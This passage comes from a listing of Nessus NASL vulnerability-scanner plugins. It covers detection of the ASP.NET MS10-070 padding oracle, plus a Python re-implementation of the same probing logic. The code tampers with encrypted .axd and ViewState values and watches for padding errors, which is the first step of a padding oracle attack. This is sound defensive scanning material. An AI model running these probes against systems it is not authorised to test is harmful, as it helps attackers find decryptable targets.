    if (rpm_check(release:"SLES10", sp:4, cpu:"x86_64", reference:"mono-core-32bit-1.2.2-12.32.1")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else exit(0, "The host is not affected.");
    
  • NASL family: Windows
    NASL id: PADDING_ORACLE_MS10-070.NASL
    description: There is an information disclosure vulnerability in ASP.NET, part of the .NET framework. Information can be leaked due to improper error handling during encryption padding. A remote attacker could exploit this to decrypt and modify an ASP.NET application's server-encrypted data.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 49806
    published: 2010-10-08
    reporter: This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/49806
    title: MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042) (uncredentialed check)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(49806);
      script_version("1.20");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042) (uncredentialed check)");
      script_summary(english:"Test vulnerability of ASP.NET to MS10-070");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "The version of the .NET framework installed on the remote host has an
    information disclosure vulnerability."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "There is an information disclosure vulnerability in ASP.NET, part of
    the .NET framework.  Information can be leaked due to improper error
    handling during encryption padding.
    
    A remote attacker could exploit this to decrypt and modify an ASP.NET
    application's server-encrypted data.  In .NET Framework 3.5 SP1 and
    above, an attacker could exploit this to download any file within the
    ASP.NET application, including web.config."
      );
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(
        attribute:"solution",
        value:
    "Microsoft has released a set of patches for Windows XP, 2003, Vista,
    2008, 7, and 2008 R2."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/09/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/08");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:.net_framework");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"Windows");
      script_copyright(english:"This script is Copyright (C) 2010-2020 Tenable Network Security, Inc.");
    
      script_dependencie("webmirror.nasl", "http_version.nasl");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    function base64url_decode(str)
    {
      local_var cstr,padlen;
    
      # strip last char
      cstr = substr(str, 0, strlen(str) - 2);
    
      # num of '=' to pad
      padlen = str[strlen(str) -1];
    
      cstr = str_replace(string:cstr, find:"-",replace:"+");
      cstr = str_replace(string:cstr, find:"_",replace:"/");
      cstr += crap(data:"=",length:padlen);
    
      return base64_decode(str:cstr);
    }
    
    function base64url_encode(str)
    {
      local_var cstr, idx, padchars;
    
      cstr = base64(str:str);
    
      # look for '='
      idx = stridx(cstr,"=");
    
      if(idx != -1)
      {
        padchars  = substr(cstr, idx, strlen(cstr) -1);
    
        cstr      = substr(cstr, 0, idx -1);
        cstr      += strlen(padchars);
      }
      else # no padding
        cstr += "0";
    
      cstr = str_replace(string:cstr, find:"+",replace:"-");
      cstr = str_replace(string:cstr, find:"/",replace:"_");
    
      return cstr;
    }
    
    #
    # parse link like url?arg1=value1&arg2=value2...
    #
    # ret['url']    = url part
    # ret['args']   = array of 'arg' associative arrays
    #
    function parse_link(link)
    {
      local_var ret, arg_pair_l, arg_pair, array, arg, match;
    
      match = eregmatch(string:link,pattern:"^(.+)\?(.+)$");
    
      # link with no arguments
      if(! match)
      {
        ret['url'] = link;
        return ret;
      }
    
      ret['url'] = match[1];
      arg_pair_l = split(match[2],sep:"&", keep:FALSE);
    
      foreach arg_pair(arg_pair_l)
      {
        array = split(arg_pair,sep:"=",keep:FALSE);
        arg[array[0]]  = array[1];
      }
    
      ret['args'] = arg;
    
      return ret;
    }
    
    # Perform the axd check with the given d and t arguments
    function check_axd_go(port, path, d, t)
    {
      local_var req, res, axd, fixed, original, final_url, links, array, item;
    
      # Make sure we have all the arguments we need
      if(isnull(path) || isnull(d) || isnull(t))
        return NULL;
    
      #decode
      original = base64url_decode(str:d);
    
      #change the last byte
      fixed = original;
      fixed[strlen(fixed)-1] = raw_string(ord(fixed[strlen(fixed) - 1]) -1);
    
      #re-encode
      fixed = base64url_encode(str:fixed);
    
      #build the final url to request
      final_url = "/" + path + '?d=' + fixed + '&t=' + t;
    
      #Resend the request with the changed padding
      req = http_mk_get_req(port:port, item: final_url, version: 11);
      res = http_send_recv_req(port:port, req:req, fetch404:TRUE, exit_on_fail:TRUE);
    
      # See if the page contained a padding error
      if("adding is invalid" >< res[2])
      {
        return path + " returned a padding error.";
      }
      else if(("CryptographicException" >< res[2]) || ("Bad Data" >< res[2]))
      {
        return path + " returned a runtime error.";
      }
      else if("404" >< res[0])
      {
        exit(0, "The web server on port " + port + " returned a 404 error on " + path + " with invalid padding.");
      }
      else if("302" >< res[0])
      {
        exit(0, "The web server on port " + port + " returned a HTTP Redirect on " + path + " with invalid padding, which may indicate mitigation is in place.");
      }
      else
      {
        return NULL;
      }
    }
    
    function check_axd(port, path)
    {
      local_var req, res, axd, fixed, original, final_url, links, array, item;
      local_var link, result;
      local_var args;
      req = http_mk_get_req(port:port, item:path, version: 11);
      res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE, fetch404:TRUE);
    
      links = egrep(pattern:'\\.axd', string:res[2]);
    
      if(!links)
        return NULL;
    
      array = split(links, sep:'\n');
    
      foreach item(array)
      {
        item = chomp(item);
    
        axd = eregmatch(pattern:'[\'"]([^"\']+\\.axd[^\'"]*)["\']', string:item);
    
        if(!isnull(axd))
        {
          if("http" >!< axd[0])
          {
            link = parse_link(link:axd[1]);
                args = link['args'];
            result = check_axd_go(port:port, path:link['url'], d:args['d'], t:args['t']);
    
            if(!isnull(result))
            {
              return result;
            }
          }
        }
      }
    }
    
    function check_viewstate_go(port, path, viewstate, event_validation)
    {
      local_var viewstate_bin, fixed, postdata, res;
    
      # make sure we have all the arguments we need
      if(isnull(path) || isnull(viewstate) || isnull(event_validation))
        return NULL;
    
      # Decode
      viewstate_bin = base64_decode(str: viewstate);
    
      # Modify the last character in the string to induce a padding error
      fixed = viewstate_bin;
      fixed[strlen(fixed)-1] = raw_string(ord(fixed[strlen(fixed) - 1]) -1);
    
      # Re-encode
      fixed = base64(str:fixed);
    
      # URL-encode the strings (we only have to worry about three symbols)
      fixed = str_replace(string:fixed, find:"+",replace:"%2b");
      fixed = str_replace(string:fixed, find:"/",replace:"%2f");
      fixed = str_replace(string:fixed, find:"=",replace:"%3d");
      event_validation = str_replace(string:event_validation, find:"+",replace:"%2b");
      event_validation = str_replace(string:event_validation, find:"/",replace:"%2f");
      event_validation = str_replace(string:event_validation, find:"=",replace:"%3d");
    
      postdata = "__VIEWSTATE=" + fixed + "&" + "__EVENTVALIDATION=" + event_validation + "&__VIEWSTATEENCRYPTED=''";
    
      res = http_send_recv3(method: "POST", item: "/", port: port, content_type: "application/x-www-form-urlencoded", data: postdata, exit_on_fail:TRUE, fetch404:TRUE);
    
      if("adding is invalid" >< res[2])
      {
        return "Viewstate at " + path + " returned a padding error.";
      }
      else if("rypto" >< res[2] && 'xception' >< res[2])
      {
        return "Viewstate at " + path + " returned a cryptographic exception.";
      }
      else
      {
        return NULL;
      }
    
    }
    
    function mk_list()
    {
      if (isnull(_FCT_ANON_ARGS[0]))	return make_list();
      else					return make_list(_FCT_ANON_ARGS[0]);
    }
    
    function check_viewstate(port, path)
    {
      local_var req, res, viewstate, event_validation;
    
      req = http_mk_get_req(port:port, item:path, version: 11);
      res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE, fetch404:TRUE);
    
      if("__VIEWSTATE" >!< res[2])
      {
        return NULL;
      }
    
      if("__VIEWSTATEENCRYPTED" >!< res[2])
      {
        return NULL;
      }
    
      viewstate = eregmatch(pattern:'<[^>]+hidden[^>]+name=["\']__VIEWSTATE[^>]+value=["\']([^"\']+)["\']', string:res[2]);
      event_validation = eregmatch(pattern:'<[^>]+hidden[^>]+name=["\']__EVENTVALIDATION[^>]+value=["\']([^"\']+)["\']', string:res[2]);
    
      if(isnull(viewstate) || isnull(event_validation))
      {
        return NULL;
      }
    
      return check_viewstate_go(port:port, path:path, viewstate:viewstate[1], event_validation:event_validation[1]);
    }
    
    var port, axd_files, viewstate_files;
    var axd_count, viewstate_count;
    
    
    port = get_http_port(default:80);
    
    # Get a list of .axd files from the webspider script. If CGI scanning is off,
    # this will be less effective.
    axd_files = get_kb_list("www/" + port + "/content/extensions/axd");
    
    if(isnull(axd_files))
    {
      var result;
      # If we don't have the webmirror extension, check the root folder
      result = check_axd(port:port, path:'/');
    
      if(!isnull(result))
      {
        security_warning(port:port, extra:'\n' + result + '\n');
        exit(0);
      }
    }
    else
    {
      axd_files = make_list(axd_files);
      axd_count = 0;
    
      foreach axd(axd_files)
      {
        var d_list, t_list;
        d_list = get_kb_list("www/" + port + "/cgi-params" + axd + "/d");
        t_list = get_kb_list("www/" + port + "/cgi-params" + axd + "/t");
    
        if(!isnull(d_list) && !isnull(t_list))
        {
          var max, i;
    
          d_list = make_list(d_list);
          t_list = make_list(t_list);
    
          max = max_index(d_list);
    
          for(i = 0; i < max; i++)
          {
            var d, t;
            d = d_list[i];
            t = t_list[i];
            if(isnull(t))
              t = '';
    
            result = check_axd_go(port:port, path:axd, d:d, t:t);
            if(!isnull(result))
            {
              security_warning(port:port, extra:'\n' + result + '\n');
              exit(0);
            }
          }
    
          # Limit the number of files we check
          if(axd_count > 4)
            break;
          axd_count++;
        }
      }
    }
    
    # Get a list of all .cgis. If CGI scanning is turned off, again, this will be more complicated
    viewstate_files = get_kb_list('www/' + port + '/cgi');
    if(isnull(viewstate_files))
    {
      # Check the root path only
      var result;
      result = check_viewstate(port:port, path:'/');
      if(!isnull(result))
      {
        security_warning(port:port, extra:'\n' + result + '\n');
        exit(0);
      }
    }
    else
    {
      viewstate_files = make_list(viewstate_files);
      viewstate_count = 0;
    
      # Search our viewstate files for one with __VIEWSTATEENCRYPTED
      foreach file(viewstate_files)
      {
            var viewstate_encrypted;
    
            viewstate_encrypted = get_kb_list("www/" + port + "/cgi-params" + file + "/__VIEWSTATEENCRYPTED");
    
        if(!isnull(viewstate_encrypted))
        {
          var viewstate, event_validation, result, lVS, lEV;
    
          lVS = mk_list(get_kb_list("www/" + port + "/cgi-params" + file + "/__VIEWSTATE"));
          foreach viewstate (lVS)
          {
            lEV = mk_list(get_kb_list("www/" + port + "/cgi-params" + file + "/__EVENTVALIDATION"));
            foreach event_validation (lEV)
            {
              result = check_viewstate_go(port:port, path:file, viewstate:viewstate, event_validation:event_validation);
    
              if(!isnull(result))
              {
                security_warning(port:port, extra:'\n' + result + '\n');
                exit(0);
              }
            }
          }
        }
    
        # Limit the number of files we check
        if(viewstate_count > 4)
          break;
        viewstate_count++;
      }
    
    }
    
    exit(0, "The web server on port " + port + " didn't have a vulnerable .axd file or encrypted viewstate that could be found.");
    
    
  • NASL family: CGI abuses
    NASL id: PADDING_ORACLE.NASL
    description: By manipulating the padding on an encrypted string, Nessus was able to generate an error message that indicates a likely 'padding oracle' vulnerability.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 50413
    published: 2010-10-29
    reporter: This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/50413
    title: CGI Generic Padding Oracle
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    if (description)
    {
      script_id(50413);
      script_version("1.16");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316, 44285);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"CGI Generic Padding Oracle");
      script_summary(english:"Generic padding oracle detection");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "A web application hosted on the remote server is potentially prone to
    a padding oracle attack"
      );
    
      script_set_attribute(
        attribute:"description",
        value:
    "By manipulating the padding on an encrypted string, Nessus was able
    to generate an error message that indicates a likely 'padding oracle'
    vulnerability.  Such a vulnerability can affect any application or
    framework that uses encryption improperly, such as some versions of
    ASP.net, Java Server Faces, and Mono. 
    
    An attacker may exploit this issue to decrypt data and recover
    encryption keys, potentially viewing and modifying confidential data. 
    
    Note that this plugin should detect the MS10-070 padding oracle
    vulnerability in ASP.net if CustomErrors are enabled in that."
      );
      script_set_attribute(
        attribute:"solution",
        value: 
    "Update the affected server software, or modify the CGI scripts so
    that they properly validate encrypted data before attempting
    decryption."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"see_also", value:"http://netifera.com/research/");
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(attribute:"see_also", value:"https://www.mono-project.com/Vulnerabilities/#ASP.NET_Padding_Oracle");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=623799");
      script_set_attribute(attribute:"vuln_publication_date",value:"2010/09/17");
      script_set_attribute(attribute:"patch_publication_date",value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/29");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
    
      script_end_attributes();
    
      script_category(ACT_MIXED_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2010-2020 Tenable Network Security, Inc.");
    
      script_dependencie("webmirror.nasl", "http_version.nasl");
      script_require_ports("Services/www", 80);
      script_exclude_keys("Settings/disable_cgi_scanning");
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("byte_func.inc");
    include("url_func.inc");
    include("torture_cgi.inc");
    
    # Define encoding constants
    ENCODING_BASE64 = 1;
    ENCODING_BASE64_URL = 2;
    ENCODING_HEX = 3;
    
    # Define the strings that indicate vulnerability. These will only trigger if they're found by switching
    # the last bit, not the first bit or no bits, so they can be somewhat general. 
    VULN_STRINGS = make_list('padding', 'runtime', 'runtime error', 'server error', 'cryptographicexception', 'crypto');
    
    # Keep track of what we've already tested so we don't repeat checks
    cache = make_list();
    
    # 'vulnerable' collects one line per affected page/argument. If it is still empty at the
    # end of execution, the exit message depends on whether any encrypted data was found at all.
    vulnerable = '';
    found_encrypted = FALSE;
    
    # Decode a URL-encoded Base64 string (used by ASP.net). Basically, it's base64 with different
    # symbols, and with an integer for padding instead of equal signs. 
    function base64url_decode(str)
    {
      local_var cstr,padlen;
     
      # strip last char
      cstr = substr(str, 0, strlen(str) - 2);
     
      # num of '=' to pad
      padlen = str[strlen(str) -1];
     
      cstr = str_replace(string:cstr, find:"-",replace:"+");
      cstr = str_replace(string:cstr, find:"_",replace:"/");
      cstr += crap(data:"=",length:padlen);
     
      return base64_decode(str:cstr);
    }
    
    function base64url_encode(str)
    {
      local_var cstr, idx, padchars;
     
      cstr = base64(str:str);
     
      # look for '='
      idx = stridx(cstr,"=");
     
      if(idx != -1)
      {
        padchars  = substr(cstr, idx, strlen(cstr) -1);
     
        cstr      = substr(cstr, 0, idx -1);
        cstr      += strlen(padchars);
      }
      else # no padding
        cstr += "0";
     
      cstr = str_replace(string:cstr, find:"+",replace:"-");
      cstr = str_replace(string:cstr, find:"/",replace:"_");
     
      return cstr;
    }
    
    # Decide if the data given in 'data' is encrypted
    #
    # It turns out that this is difficult to do on short strings, so we are going to
    # solve this by cheating. Basically, check if the string contains any non-ASCII
    # characters (<0x20 or >0x7F). The odds of a 4-character encrypted string having
    # at least one character that falls outside of ASCII are almost 100%. We also
    # ignore any string shorter than 16 bytes, since those are generally too short
    # to be encrypted.
    function is_encrypted(data)
    {
      local_var non_ascii, i, b;
    
      # Make sure we have a reasonable sized string (encrypted strings tend to be long, and short strings tend to 
      # break our numbers)
      if(strlen(data) < 16)
        return FALSE;
    
      non_ascii = 0;
      for(i = 0; i < strlen(data); i++)
      {
        b = getbyte(blob:data, pos:i);
        if(b < 0x20 || b > 0x7F)
          non_ascii++;
      }
    
      return (non_ascii > (strlen(data) / 4));
    }
    
    # All encrypted CGI arguments have an encoding. Here is what I've found so far:
    # ASP.net .axd files - base64-url
    # ASP.net __VIEWSTATE - base64
    # Mono .axd files - hex
    # Mono __VIEWSTATE - hex
    #
    # We give priority to hex. If a string has an even number of characters in the range 0-9 and A-F, we call
    # it hex and don't try Base64. It's fairly unlikely that a reasonably sized base64 string would be exclusively
    # hex characters. 
    #
    # Base64 and Base64 URL are a little more difficult to distinguish. In *most* cases, we're okay, but once in awhile 
    # it may be decoded incorrectly, in which case two different encodings are returned. 
    function decode(data)
    {
      local_var decoded_str, decoded;
      decoded = make_array();
    
      # Get rid of strings that are all numeric (they probably aren't encoded and they pollute our results)
      if(ereg(string:data, pattern:"^[0-9]+$"))
      {
        return NULL;
      }
    
      # Hex strings are a-fA-F0-9. Although it's technically possible for a base64 string to look like this,
      # it's exceptionally unlikely.
      if(ereg(string:data, pattern:"^([a-fA-F0-9]{2})+$"))
      {
        decoded_str = hex2raw(s:data);
        if(decoded_str)
        {
          decoded[ENCODING_HEX] = decoded_str;
          return decoded;
        }
      }
    
    
      # base64url always has an integer 0, 1, or 2 at the end, and contains letters, numbers, -, and _. The
      # final byte is the number of padding bytes, so the string length with a number of extra bytes equal
      # to the final digit has to be a multiple of 4. 
      if(ereg(string:data, pattern:"^[a-zA-Z0-9_-]+[012]$"))
      {
        # The last letter represents the length
        if(((strlen(data) - 1 + int(data[strlen(data)-1])) % 4) == 0)
        {
          decoded_str = base64url_decode(str:data);
    
          if(decoded_str)
            decoded[ENCODING_BASE64_URL] = decoded_str;
        }
      }
    
      # base64 strings are similar, except they can contain + and /, and end with 0 - 2 '=' signs. They are
      # also a multiple of 4 bytes. 
      if(ereg(string:data, pattern:"^[a-zA-Z0-9/+]+={0,2}$") && (strlen(data) % 4) == 0)
      {
        decoded_str = base64_decode(str:data);
        if(decoded_str)
          decoded[ENCODING_BASE64] = decoded_str;
      }
    
      if(max_index(keys(decoded)) == 0)
        return NULL;
      return decoded;
    }
    
    function encode(data, encoding)
    {
      if(encoding == ENCODING_BASE64_URL)
        return base64url_encode(str:data);
    
      if(encoding == ENCODING_BASE64)
        return base64(str:data);
    
      if(encoding == ENCODING_HEX)
        return hexstr(data);
    
      exit(0, "Unknown encoding type was passed to encode(): " + encoding);
      return NULL;
    }
    
    function go(port, page, new_arg, new_value)
    {
      local_var query, arg_value, res;
      local_var arg, args, arg2;
    
      # First, we need to get all the arguments for the page
      query = page + '?';
    
      # Then get all the arguments, and replace the one we want
      args = get_cgi_arg_list(port: port, cgi: page);
      if (max_index(args) == 0)
        exit(0, "Couldn't get args list"); # Shouldn't ever happen (we already did this check)
    
      foreach arg(args)
      {
        arg2 = replace_cgi_1arg_token(port: port, arg: arg);
        if (arg2 == new_arg)
        {
          query = query + arg2 + "=" + urlencode(str:new_value) + "&";
        }
        else
        {
          arg_value = get_cgi_arg_val_list(port: port, cgi: page, arg: arg);
          if(max_index(arg_value) == 0 || !arg_value[0])
            arg_value = make_list('');
    
          query = query + arg2 + "=" + urlencode(str:arg_value[0]) + "&";
        }
      }
      query = substr(query, 0, strlen(query)-2);
    
      res = http_send_recv3(method:'GET', item:query, port:port, fetch404:TRUE, exit_on_fail:TRUE);
    
      return res;
    }
    
    function do_check(port, page, arg, value, encoding)
    {
      local_var temp, test_values, i;
      local_var result, test_results;
      local_var vuln_string;
    
      test_values = make_list();
      test_results = make_list();
    
      test_values[0] = value;
    
      # The second test is going to change the first bit
      temp = value;
      temp[0] = raw_string(ord(value[0]) ^ 1);
      test_values[1] = temp;
    
      # The third test is going to change the last bit
      temp = value;
      temp[strlen(value)-1] = raw_string(ord(value[strlen(value) - 1]) ^ 1);
      test_values[2] = temp;
    
      # Encode all the values using the given encoding
      for(i = 0; i < max_index(test_values); i++)
      {
        test_values[i] = encode(data:test_values[i], encoding:encoding);
        result = go(port:port, page:page, new_arg:arg, new_value:test_values[i]);
        test_results[i] = tolower(result[0] + result[1] + result[2]);
      }
    
      # If the control test returned an error, then keep going
      if('200' >!< test_results[0])
        return;
    
      # Check if changing the last bit produced a result that changing the first bit didn't. These results are based
      # on a list of error strings. 
      foreach vuln_string(VULN_STRINGS)
      {
        if(vuln_string >< test_results[2] && vuln_string >!< test_results[1] && vuln_string >!< test_results[0])
        {
          vulnerable += '  - ' + page + ' [arg=' + arg + ']\n';
          return TRUE;
        }
      }
    }
    
    function try_check(port, page, arg, value)
    {
      local_var cached;
      local_var decoded, data;
      local_var key;
    
      # Check if we've already looked at this argument
      foreach cached(cache)
        if(cached == value)
          return;
    
      cache = make_list(cache, value);
    
      # Try decoding the argument
      decoded = decode(data:value);
    
      if(decoded)
      {
        # Loop through the possible encryptions
        foreach key(keys(decoded))
        {
          if(is_encrypted(data:decoded[key]))
          {
            found_encrypted = TRUE;
            do_check(port:port, page:page, arg:arg, value:decoded[key], encoding:key);
            if (vulnerable && !thorough_tests) break;
          }
        }
      }
    }
    
    port = get_http_port(default:80, embedded: 0);
    
    # Get a list of all CGI files. If CGI scanning is turned off, we give up and die
    if (get_kb_item("Settings/disable_cgi_scanning"))
      exit(0, "CGI scanning is disabled.");
    
    cgi = get_cgi_list(port: port);
    if (isnull(cgi)) exit(0, "Couldn't find any web applications on the web server on port "+port+".");
    
    # Look for a CGI with an encrypted argument
    foreach file (cgi)
    {
      cgi_args = get_cgi_arg_list(port: port, cgi: file);
      if(max_index(cgi_args) > 0)
      {
        foreach cgi_arg(cgi_args)
        {
          values = get_cgi_arg_val_list(port: port, cgi: file, arg: cgi_arg);
          if(max_index(values) > 0)
          {
            cgi_arg = replace_cgi_1arg_token(port: port, arg: cgi_arg);
            try_check(port:port, page:file, arg:cgi_arg, value:values[0]);
            if (vulnerable && !thorough_tests) break;
          }
        }
      }
    }
    
    if(vulnerable) 
    {
      if (report_verbosity > 0)
      {
        if (max_index(split(vulnerable)) > 1)
        {
          s = "s";
          are = "are";
        }
        else 
        {
          s = "";
          are = "is";
        }
    
        report = 
          '\n' +
          'The following page'+s+' / argument'+s+' '+are+' potentially affected :\n' +
          '\n' +
          vulnerable;
        if (!thorough_tests)
          report += 
            '\n' +
            'Note that Nessus stopped searching after one affected script was found.\n' +
            'For a complete scan, enable the \'Perform thorough tests\' setting and\n' +
            're-scan.\n';
    
        security_warning(port:port, extra:report);
      }
      else security_warning(port);
      exit(0);
    }
    else if(found_encrypted)
      exit(0, "The web server on port " + port + " appears to use encrypted data and appears unaffected.");
    else
      exit(0, "The web server on port " + port + " does not appear to use encrypted data so no checks were performed.");
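As an added example (not Tenable's plugin code), the pieces both plugins above rely on, re-implemented in Python: the ASP.NET .axd base64url variant with its trailing pad-count digit, the hex / base64url / base64 candidate detection and the is_encrypted heuristic, and the comparison of a control response against first-byte and last-byte bit-flip responses that separates a padding-specific error from a page that errors on any change. Function names mirror the plugin's; the sample ciphertext and HTTP responses are constructed.

```python
import base64
import binascii
import re

# Encoding labels, mirroring the plugin's ENCODING_* constants.
ENCODING_BASE64 = "base64"
ENCODING_BASE64_URL = "base64url"
ENCODING_HEX = "hex"

# Error markers the plugin expects only in the "last byte flipped" response.
VULN_STRINGS = ("padding", "runtime", "runtime error", "server error",
                "cryptographicexception", "crypto")

def base64url_decode(value: str) -> bytes:
    """ASP.NET .axd variant: URL-safe alphabet, trailing digit = number of '=' removed."""
    padlen = int(value[-1])
    body = value[:-1].replace("-", "+").replace("_", "/") + "=" * padlen
    return base64.b64decode(body, validate=True)

def base64url_encode(data: bytes) -> str:
    """Inverse: strip '=' padding and append its count as a single digit."""
    std = base64.b64encode(data).decode("ascii")
    stripped = std.rstrip("=")
    return stripped.replace("+", "-").replace("/", "_") + str(len(std) - len(stripped))

def is_encrypted(data: bytes) -> bool:
    """Plugin heuristic: at least 16 bytes, more than a quarter outside printable ASCII."""
    if len(data) < 16:
        return False
    non_ascii = sum(1 for b in data if b < 0x20 or b > 0x7F)
    return non_ascii > len(data) // 4

def decode(value: str) -> dict:
    """Return {encoding: raw bytes} for each encoding the value plausibly uses."""
    decoded = {}
    if re.fullmatch(r"[0-9]+", value):               # bare integers are never ciphertext
        return decoded
    if re.fullmatch(r"(?:[a-fA-F0-9]{2})+", value):  # hex wins outright
        decoded[ENCODING_HEX] = bytes.fromhex(value)
        return decoded
    # base64url: [A-Za-z0-9_-] body, final digit 0-2, body length + digit a multiple of 4
    if re.fullmatch(r"[a-zA-Z0-9_-]+[012]", value) and (len(value) - 1 + int(value[-1])) % 4 == 0:
        try:
            decoded[ENCODING_BASE64_URL] = base64url_decode(value)
        except binascii.Error:
            pass
    # standard base64: [A-Za-z0-9/+] body, 0-2 trailing '=', length a multiple of 4.
    # A value may match both this and base64url; both candidates are returned.
    if re.fullmatch(r"[a-zA-Z0-9/+]+={0,2}", value) and len(value) % 4 == 0:
        try:
            decoded[ENCODING_BASE64] = base64.b64decode(value, validate=True)
        except binascii.Error:
            pass
    return decoded

def encode(data: bytes, encoding: str) -> str:
    if encoding == ENCODING_BASE64_URL:
        return base64url_encode(data)
    if encoding == ENCODING_BASE64:
        return base64.b64encode(data).decode("ascii")
    if encoding == ENCODING_HEX:
        return data.hex()
    raise ValueError(f"unknown encoding {encoding!r}")

def oracle_probes(value: str, encoding: str) -> list:
    """The three request values: unchanged, first byte bit-flipped, last byte bit-flipped."""
    data = decode(value)[encoding]
    first = bytes([data[0] ^ 1]) + data[1:]
    last = data[:-1] + bytes([data[-1] ^ 1])
    return [encode(d, encoding) for d in (data, first, last)]

def classify_responses(control: str, first_flipped: str, last_flipped: str):
    """Marker seen only when the last byte is flipped, else None (a padding-specific error)."""
    ctl, fb, lb = control.lower(), first_flipped.lower(), last_flipped.lower()
    if "200" not in ctl:                              # the control request must succeed
        return None
    for marker in VULN_STRINGS:
        if marker in lb and marker not in fb and marker not in ctl:
            return marker
    return None

# Constructed sample ciphertext and responses (not captured from any real application).
SAMPLE_CT = bytes([0xFB, 0xEF, 0xBE, 0x41, 0x00, 0x7F, 0xC3, 0x9A]) * 3
RESP_OK = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>Welcome</html>"
RESP_PAD = ("HTTP/1.1 500 Internal Server Error\r\n\r\n"
            "<html>Padding is invalid and cannot be removed.</html>")

if __name__ == "__main__":
    value = base64url_encode(SAMPLE_CT)
    print("axd-style value:    ", value)
    print("candidate encodings:", list(decode(value)))
    print("looks encrypted:    ", is_encrypted(SAMPLE_CT))
    print("probes:", oracle_probes(value, ENCODING_BASE64_URL))
    print("oracle marker:", classify_responses(RESP_OK, RESP_OK, RESP_PAD))
```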
    
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201206-13.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201206-13 (Mono: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Mono and Mono debugger. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could execute arbitrary code, bypass general constraints, obtain the source code for .aspx applications, obtain other sensitive information, cause a Denial of Service, modify internal data structures, or corrupt the internal state of the security manager. A local attacker could entice a user into running Mono debugger in a directory containing a specially crafted library file to execute arbitrary code with the privileges of the user running Mono debugger. A context-dependent attacker could bypass the authentication mechanism provided by the XML Signature specification. Workaround : There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 59651
    published: 2012-06-22
    reporter: This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/59651
    title: GLSA-201206-13 : Mono: Multiple vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
